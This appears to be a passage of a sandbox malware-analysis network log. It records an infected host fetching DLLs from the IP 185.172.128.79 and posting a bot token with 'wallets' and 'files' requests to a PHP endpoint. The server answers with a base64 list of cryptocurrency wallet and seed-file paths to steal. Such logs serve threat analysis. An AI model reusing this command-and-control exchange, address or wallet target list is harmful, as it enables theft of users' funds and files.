                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:02.884490013 CET94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:03.202954054 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 257872
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:03.717631102 CET98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:04.035901070 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:03 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                                                                                ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:05.483810902 CET201OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 947
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:05.821293116 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:05.889448881 CET468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="message"wallets------IIDHJKFBGIIJJKFIJDBG--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:06.212568998 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2408
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:06.216924906 CET466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 265
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="message"files------BAKEBAFIIECBGCAAAAFC--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:06.544961929 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2052
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
